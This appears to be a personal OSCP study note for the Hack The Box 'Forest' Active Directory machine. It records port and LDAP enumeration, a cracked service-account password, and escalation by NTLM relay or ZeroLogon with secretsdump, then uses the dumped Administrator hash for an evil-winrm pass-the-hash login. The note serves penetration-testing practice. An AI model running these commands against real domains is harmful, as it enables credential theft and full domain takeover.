htb-ad-1-forest - My-oscp-all-things

10.10.10.161 ### ports informations ``` Open 10.10.10.161:53 Open 10.10.10.161:88 Open 10.10.10.161:135 Open 10.10.10.161:139 Open 10.10.10.161:389 Open 10.10.10.161:445 Open 10.10.10.161:464 Open 10.10.10.161:593 Open 10.10.10.161:636 Open 10.10.10.161:3268 Open 10.10.10.161:3269 Open 10.10.10.161:5985 Open 10.10.10.161:9389 Open 10.10.10.161:47001 Open 10.10.10.161:49664 Open 10.10.10.161:49665 Open 10.10.10.161:49667 Open 10.10.10.161:49666 Open 10.10.10.161:49671 Open 10.10.10.161:49676 Open 10.10.10.161:49677 Open 10.10.10.161:49684 Open 10.10.10.161:49703 ``` ``` enum4linux 10.10.10.161 -> domain name : HTB NetBIOS computer name: FOREST\x00 ldapsearch -x -s base -h 10.10.10.161 htb.local ldapServiceName: htb.local:[email protected] ``` users-list ``` lucinda mark santi sebastien svc-alfresco ``` ![[Pasted image 20220114203554.png]] Holders svc-alfresco : s3rvice ![[Pasted image 20220114203917.png]] user.txt : c4e589d5310a122ef762f025fcfbb179 ### to administrator way 0 ![[Pasted image 20220114220703.png]] ntlmrelayx.py [http://YOUR__IP/privexchange/](http://your__ip/privexchange/) ``` impacket-ntlmrelayx -t ldap://172.31.3.2 --escalate-user roastsvc ``` or acl abuse ### to administrator way 1 ``` python zeroLogon-NullPass.py FOREST 10.10.10.161 python zeroLogon-NullPass.py FOREST 10.10.10.161 impacket-secretsdump FOREST\[email protected] -just-dc ``` ![[Pasted image 20220114211735.png]] ![[Pasted image 20220114212524.png]] ``` htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: evil-winrm -i 10.10.10.161 -u 'administrator' -H "32693b11e6aa90eb43d32c72a07ceea6" ``` ![[Pasted image 20220114212723.png]] root.txt : 68ab5625a5515804b1e0d8593329eb7a